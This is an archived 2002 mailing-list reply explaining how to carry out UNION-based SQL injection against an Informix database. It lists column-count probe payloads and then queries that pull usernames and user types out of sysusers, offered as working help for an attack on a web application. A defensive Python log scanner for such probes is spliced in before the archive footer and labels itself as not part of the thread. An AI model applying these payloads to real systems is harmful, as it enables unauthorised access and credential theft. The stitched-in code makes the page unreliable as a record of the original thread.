Re: SQL Injection with Informix

From: Martin Eiszner (martin@websec.org)
Date: Thu Jul 04 2002 - 03:45:06 EDT


On Wed, 3 Jul 2002 16:28:18 -0600
"Whyte, Jesse" <Jesse.Whyte@us.gambro.com> wrote:

> http://app.default.com/default.cfm?var='UNION%20ALL%20SELECT%20username%2C%2
> 0usertype%20FROM%20sysusers
> [Informix][Informix ODBC Driver][Informix]Corresponding column types must be
> compatible for each UNION statement.

..........................

hola,

i never did a test on informix .. but ...

The first test (queries) should be something like:
(using "1" should satisfy all different data types for all the other fields)

check out a standard-table with many fields (or something like "dual" on oracle ..)

---*---
union select '1' from [TABLEX];--
union select '1','1' from [TABLEX];--
union select '1','1','1' from [TABLEX];--
union select '1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1','1','1' from [TABLEX];--

(and so on ...)
---*---

(using "1" should satisfy all different data types for all the other fields)

.. you know that you hit the right column-number when there is no
more error-message ..

username and usertype could be concatenated "username||usertype" (check the "concat"-syntax for informix).
so there is only one char, varchar, text(or similar) field left that you
have to "hit directly".

now try to brute-force any proper "query-signature" of the union statement:

---*---

union select '1',(username||usertype),['1' x number of fields] from sysusers;--
union select '1','1',(username||usertype),['1' x number of fields - 1] from sysusers;--
union select '1','1','1',(username||usertype),['1' x number of fields - 2] from sysusers;--
union select '1','1','1','1',(username||usertype),['1' x number of fields - 3] from sysusers;--
union select '1','1','1','1','1',(username||usertype),['1' x number of fields - 4] from sysusers;--
union select '1','1','1','1','1','1',(username||usertype),['1' x number of fields - 5] from sysusers;--

(and so on ...)

---*---

check the response for differences ... that should do the trick ...

another possibility is "typecasting" every field within the result-set into 1 type ("text" for example).
(check out your informix-manual for the correct syntax).

the only thing you have to guess (brute-force) with this method, is the number of fields in the result-set.

hope that helps, nice day,

martin

mei@websec.org
http://www.websec.org
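The column-walking UNION probes described in the reply above leave a distinctive pattern in web server access logs. As an added example (not from the thread or from any Informix tooling), this Python snippet decodes each request's query string, counts the columns in any UNION SELECT it contains, and flags clients that step that count upward; the log lines are constructed for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (not from the thread): one client walking the
# UNION column count upward as the post describes, plus ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Jul/2002:03:40:01 -0400] "GET /default.cfm?var=42 HTTP/1.1" 200 512
10.0.0.9 - - [04/Jul/2002:03:41:10 -0400] "GET /default.cfm?var='union%20select%20'1'%20from%20tablex;-- HTTP/1.1" 500 210
10.0.0.9 - - [04/Jul/2002:03:41:12 -0400] "GET /default.cfm?var='union%20select%20'1','1'%20from%20tablex;-- HTTP/1.1" 500 210
10.0.0.9 - - [04/Jul/2002:03:41:15 -0400] "GET /default.cfm?var='union%20select%20'1','1','1'%20from%20tablex;-- HTTP/1.1" 200 980
10.0.0.9 - - [04/Jul/2002:03:41:20 -0400] "GET /default.cfm?var='UNION%20ALL%20SELECT%20username%2C%20usertype%20FROM%20sysusers HTTP/1.1" 500 210
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$')
UNION_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\s+(?P<cols>.+?)\s+from\b", re.IGNORECASE | re.DOTALL)

def union_column_count(value):
    """Number of columns in a UNION SELECT inside a decoded parameter value, 0 if none.
    Only top-level commas count, so (username||usertype) stays a single column."""
    m = UNION_RE.search(value)
    if not m:
        return 0
    cols, depth = 1, 0
    for ch in m.group("cols"):
        depth += (ch == "(") - (ch == ")")
        cols += ch == "," and depth == 0
    return cols

def scan_log(text):
    """Return (ip, parameter, column_count, status) for each request carrying a UNION probe."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, values in parse_qs(urlsplit(m.group("target")).query).items():
            for n in map(union_column_count, values):   # parse_qs percent-decodes for us
                if n:
                    hits.append((m.group("ip"), name, n, int(m.group("status"))))
    return hits

def enumeration_sources(hits, min_distinct=3):
    """IPs whose probes used at least min_distinct different column counts: the walk-up pattern."""
    seen = defaultdict(set)
    for ip, _, n, _ in hits:
        seen[ip].add(n)
    return sorted(ip for ip, counts in seen.items() if len(counts) >= min_distinct)
```

Pairing the column count with the response status (error page versus 200) shows the moment a probe stopped producing the UNION type error, which is exactly the signal the reply says the tester is looking for.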



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:23 EDT